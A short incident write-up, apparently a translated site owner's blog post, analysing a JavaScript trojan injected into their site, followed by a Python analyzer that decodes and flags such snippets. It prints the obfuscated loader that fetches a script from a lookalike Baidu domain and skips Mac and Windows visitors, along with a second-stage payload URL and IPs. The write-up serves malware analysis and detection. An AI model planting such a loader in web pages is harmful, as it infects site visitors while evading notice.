Notes from One Malware-Injection Incident

I don't even remember how long it has been since this site last had a JS trojan injected; being hit again is actually rather novel. The JS trojan code:

    ;if(!(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1)){var ZPnUAADj=document.createElement('script');ZPnUAADj.type = 'text/javascript'; ZPnUAADj.src = '\x68\x74\x74\x70\x73://\x7a\x7a.\x62\x64\x75\x73\x74\x61\x74\x69\x63.\x63\x6f\x6d/\x6c\x69\x6e\x6b\x73\x75\x62\x6d\x69\x74/\x70\x75\x73\x68.\x6a\x73'; var xquXEbQZC=document.head || document.body;xquXEbQZC.appendChild(ZPnUAADj);}

After decoding:

    ;
    if (!(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1)) {
        var ZPnUAADj = document.createElement('script');
        ZPnUAADj.type = 'text/javascript';
        ZPnUAADj.src = 'https://zz.bdustatic.com/linksubmit/push.js';
        var xquXEbQZC = document.head || document.body;
        xquXEbQZC.appendChild(ZPnUAADj);
    }

JS disguised as Baidu's; it presumably abuses the direct-placement (直投) feature of Baidu ads. Continuing to decode https://zz.bdustatic.com/linksubmit/push.js, after decoding part of it I got the following code:

    var _0xodA = '5uluCj',
        _0xodA_ = function() {
            return ['_0xodA'], _0x154f = [_0xodA, 'createElement', 'script', 'src', 'https://pinz8ta5.com/99948456206396679.js', 'getElementsByTagName', 'parentNode', 'insertBefore', 'd5rYdNQUkNuKzNTBlhMuCjxL=='];
        }();

That yields the trojan URL https://pinz8ta5.com/99948456206396679.js, but its content is empty, so it is probably not the trojan's real address. Pinging it gives the IPs (China / Hong Kong / microsoft.com): 20.205.140.46, 20.205.136.131, 20.205.142.92.

To be continued.
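As an added example (not code from the post), a small Python analyzer for snippets like the one above: it decodes the \xNN-escaped string, extracts the script URL, flags the host as a lookalike of the real bdstatic.com domain, and records which gating conditions (non-Mac/Win platform, a referrer containing a dot) the snippet checks before loading anything. The SAMPLE string is a reduced copy of the injected snippet; the TRUSTED list is an assumed allowlist of first-party script hosts.

```python
import re
from urllib.parse import urlparse
# Constructed sample: the injected snippet from the post, reduced to the parts that matter.
SAMPLE = (
    ";if(!(/^Mac|Win/.test(navigator.platform)) && "
    "(document.referrer.indexOf('.') !== -1)){var s=document.createElement('script');"
    "s.src='\\x68\\x74\\x74\\x70\\x73://\\x7a\\x7a.\\x62\\x64\\x75\\x73\\x74\\x61\\x74"
    "\\x69\\x63.\\x63\\x6f\\x6d/\\x6c\\x69\\x6e\\x6b\\x73\\x75\\x62\\x6d\\x69\\x74/"
    "\\x70\\x75\\x73\\x68.\\x6a\\x73';(document.head||document.body).appendChild(s);}"
)
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
SRC_ASSIGN = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")
TRUSTED = ["bdstatic.com", "baidu.com"]  # assumed first-party script hosts for this site
EVASION = {  # conditions the snippet gates on before loading anything
    "skips_desktop": r"/\^Mac\|Win/\.test\(navigator\.platform\)",
    "needs_referrer": r"document\.referrer\.indexOf\(",
}

def unescape_hex(s):
    """Decode JS \\xNN escapes, the only obfuscation layer the snippet uses."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)

def script_srcs(js):
    """Every URL assigned to a .src property, after unescaping."""
    return [unescape_hex(u) for u in SRC_ASSIGN.findall(js)]

def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host):
    """'trusted', 'lookalike' (within 2 edits of a trusted domain) or 'unknown'."""
    domain = ".".join(host.split(".")[-2:])  # registrable part; good enough for .com
    for t in TRUSTED:
        if domain == t or levenshtein(domain, t) <= 2:
            return "trusted" if domain == t else "lookalike"
    return "unknown"

def analyze(js):
    srcs = script_srcs(js)
    hosts = {urlparse(u).hostname: classify_host(urlparse(u).hostname) for u in srcs}
    return {"srcs": srcs, "hosts": hosts,
            "evasion": [n for n, p in EVASION.items() if re.search(p, js)]}
```

`analyze(SAMPLE)` reports the decoded URL, marks zz.bdustatic.com as a lookalike of bdstatic.com, and lists both gating conditions, which is exactly the combination a scanner of your own pages should treat as suspicious.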
